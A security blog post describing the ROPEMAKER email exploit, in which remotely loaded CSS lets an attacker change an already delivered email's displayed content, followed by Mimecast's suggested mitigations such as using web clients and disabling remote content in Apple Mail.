There are quite a good number of people within and outside the info-sec community who believe that once an email comes in, and it wasn’t flagged as spam or phishing mail, passed through every email authentication filter. There is no way that email with a harmless url can suddenly become harmful; Its completely immutable to future threats and man-in-the-middle attacks they think.
Contrary to that, a new email exploit dubbed ROPEMAKER by Mimecast’s research team, turns that assumption on its head, undermining the security and non-repudiation of email; even for those that use SMIME or PGP for signing. Using the ROPEMAKER exploit a malicious actor can change the displayed content in an email at will. For example, a malicious actor could swap a benign URL with a malicious one in an email already delivered to your inbox, turn simple text into a malicious URL, or edit any text in the body of an email whenever they want. All of this can be done without direct access to the inbox.
A little overview of what a ‘Man-in-the-middle’ attack is. It’s an attack which gives an attacker powers to read, insert, and modify messages between two users or systems. The attacker can also observe and intercept messages between the two victims. Over the years, Man-in-the-middle (MITM) attacks have become an extremely successful threat vector. Exploitation usually needs knowledge of various tools and physical access to the network or proximity to an access point
What makes ROPEMAKER different?
The origin of Remotely Originated Post-delivery Email Manipulation Attacks Keeping Email Risky (ROPEMAKER) lies at the intersection of email and Web technologies, more specifically Cascading Style Sheets (CSS) used with HTML. While the use of these Web technologies has made email more visually attractive and dynamic relative to its purely text-based predecessor, this has also introduced an exploitable attack vector for email.
This remote-control-ability could enable bad actors to direct unwitting users to malicious Web sites or cause other harmful consequences using a technique that could bypass common security controls and fool even the most security savvy users. ROPEMAKER could be leveraged in ways that are limited only by the creativity of the threat actors, which experience tells us, is often unlimited.
Mime Cast Demo of ROPEMAKER and how it can be used
Email modified with ROPEMAKER
How to prevent RopeMaker and Other Unknown Email Exploits
These are some preventive measures suggested by Mimecast that can be observed to reduce the chances of you being a victim of the ropemaker exploit.
- Always rely on web-based email clients such as Gmail, Outlook.com and icloud.com. Those web clients aren’t affected by Ropemaker-style CSS exploits. Clients like the desktop and mobile version of Microsoft Outlook, Apple Mail and Mozilla Thunderbird are all vulnerable.
2. For apple mail users, it is recommended that you minimze the risk by opening the Mail app, going to Preferences, selecting the Viewing menu and unchecking the box next to “Load remote content in messages.” It should be noted the fix works only on desktop and does not apply to the mobile client.